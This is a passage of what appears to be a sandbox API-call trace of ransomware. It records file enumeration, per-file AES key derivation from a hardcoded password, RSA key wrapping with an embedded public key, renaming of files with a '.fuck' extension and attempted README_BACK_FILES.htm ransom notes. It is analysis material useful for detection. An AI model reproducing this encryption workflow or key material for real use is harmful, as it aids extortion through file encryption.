KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.277] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.277] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f69a8) returned 1 [0240.278] CryptImportPublicKeyInfo (in: hCryptProv=0x28f69a8, dwCertEncodingType=0x1, pInfo=0x28c8bd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8c08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8c10*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e89f8) returned 1 [0240.278] CryptEncrypt (in: hKey=0x28e89f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.278] CryptEncrypt (in: hKey=0x28e89f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6f80*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f6f80*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.278] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6f80, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.278] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.278] CryptEncrypt (in: hKey=0x28e84f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.278] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.278] CloseHandle (hObject=0xffffffff) returned 1 [0240.278] CloseHandle (hObject=0xffffffff) returned 1 [0240.279] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.280] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.280] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.gsg")) returned 0 [0240.281] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.fuck")) returned 0 [0240.281] CryptDestroyHash (hHash=0x28e86b8) returned 1 [0240.281] CryptDestroyKey (hKey=0x28e84f8) returned 1 [0240.281] CryptReleaseContext (hProv=0x28f6ef8, dwFlags=0x0) returned 1 [0240.281] FindNextFileA (in: hFindFile=0x28e86f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.281] FindClose (in: hFindFile=0x28e86f8 | out: hFindFile=0x28e86f8) returned 1 [0240.282] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.282] AreFileApisANSI () returned 1 [0240.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2aa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.282] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.282] GetLastError () returned 0x5 [0240.282] GetLastError () returned 0x5 [0240.283] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.283] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.283] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\readme_back_files.htm")) returned 0xffffffff [0240.283] AreFileApisANSI () returned 1 [0240.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.283] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.284] GetLastError () returned 0x5 [0240.284] GetLastError () returned 0x5 [0240.284] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.284] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e84f8 [0240.284] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.284] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.285] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.285] GetLastError () returned 0x5 [0240.285] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml")) returned 0x20 [0240.285] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.285] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.286] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.286] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.287] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6a30) returned 1 [0240.289] CryptCreateHash (in: hProv=0x28f6a30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.289] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.289] CryptHashData (hHash=0x28e88b8, pbData=0x2857290, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.289] CryptDeriveKey (in: hProv=0x28f6a30, Algid=0x6610, hBaseData=0x28e88b8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e86b8) returned 1 [0240.290] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.290] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.290] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f6568) returned 1 [0240.290] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6568, dwCertEncodingType=0x1, pInfo=0x28c8b08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8b38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8b40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e86f8) returned 1 [0240.290] CryptEncrypt (in: hKey=0x28e86f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.291] CryptEncrypt (in: hKey=0x28e86f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6128*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f6128*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.291] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6128, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.291] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.291] CryptEncrypt (in: hKey=0x28e86b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.291] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.291] CloseHandle (hObject=0xffffffff) returned 1 [0240.291] CloseHandle (hObject=0xffffffff) returned 1 [0240.291] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.292] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.293] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg")) returned 0 [0240.293] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.fuck")) returned 0 [0240.294] CryptDestroyHash (hHash=0x28e88b8) returned 1 [0240.294] CryptDestroyKey (hKey=0x28e86b8) returned 1 [0240.294] CryptReleaseContext (hProv=0x28f6a30, dwFlags=0x0) returned 1 [0240.295] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.295] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.295] GetLastError () returned 0x5 [0240.295] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml")) returned 0x20 [0240.295] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.296] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.296] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.297] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.298] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6a30) returned 1 [0240.301] CryptCreateHash (in: hProv=0x28f6a30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.301] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.301] CryptHashData (hHash=0x28e8578, pbData=0x28cb968, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.301] CryptDeriveKey (in: hProv=0x28f6a30, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e88b8) returned 1 [0240.301] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.301] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.301] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f7090) returned 1 [0240.302] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7090, dwCertEncodingType=0x1, pInfo=0x28c8078*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c80a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c80b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e86b8) returned 1 [0240.303] CryptEncrypt (in: hKey=0x28e86b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.303] CryptEncrypt (in: hKey=0x28e86b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f65f0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f65f0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.303] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f65f0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.303] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.303] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.303] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.303] CloseHandle (hObject=0xffffffff) returned 1 [0240.303] CloseHandle (hObject=0xffffffff) returned 1 [0240.303] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.304] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.305] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.gsg")) returned 0 [0240.306] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.fuck")) returned 0 [0240.306] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.306] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0240.306] CryptReleaseContext (hProv=0x28f6a30, dwFlags=0x0) returned 1 [0240.306] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.307] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8578 [0240.307] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.307] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.307] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e8638 [0240.309] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.309] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.309] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.309] GetLastError () returned 0x5 [0240.309] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.309] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.310] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.310] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.311] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.311] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6788) returned 1 [0240.314] CryptCreateHash (in: hProv=0x28f6788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 